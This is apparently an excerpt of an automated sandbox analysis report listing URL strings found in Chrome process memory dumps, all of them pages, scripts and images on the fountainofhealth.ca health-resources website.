                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/thrive/resources
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enAgent
                                  Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enHome
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enL
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enb
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enca
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/form/contact-us
                                  Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/fr/node/113
                                  Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/individuals
                                  Source: chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/ipt
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320046905.000028EC053E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315336209.000028EC06A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2misc/dialog.ajax.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/throbber-general.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/wave.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0les/views_slidesho
                                  Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500106233.000028EC0652C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315393234.000028EC04AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
                                  Source: chrome.exe, 00000000.00000002.2495959896.000028EC048B8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490480203.000028EC03F98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swjs
                                  Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472993103.000028EC029B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/n
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/om/
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/organizations
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/our-people-partners
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/our-research
                                  Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/ript
                                  Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2378748801.000028EC03845000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472109476.000028EC02820000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355559517.000028EC0799C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/document/Tips%20to%20THRIVE%20-%202024.pdf
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.png
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.pngng
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482432826.000028EC03468000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-r_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469175116.000028EC023AC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-t_2.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svggdler
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svgHandler
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485845268.000028EC0387C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png(
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png3
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg.gif
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svgeHandlerjs
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gifd-2.jpg
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
